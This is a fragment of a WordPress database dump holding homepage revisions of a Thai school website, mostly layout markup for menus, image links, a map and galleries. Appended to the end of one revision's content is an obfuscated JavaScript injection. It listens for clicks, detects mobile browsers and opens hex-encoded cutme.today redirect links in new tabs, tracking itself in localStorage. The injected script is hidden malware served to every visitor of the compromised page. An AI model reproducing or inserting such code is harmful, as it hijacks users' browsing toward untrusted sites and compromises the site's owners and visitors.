",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-16 10:32:26','2025-06-16 03:32:26','',14,'http://pakhaeng.ssk.in.th/?p=1395',0,'revision','',0),
(1397,1,'2025-06-16 10:36:10','2025-06-16 03:36:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\"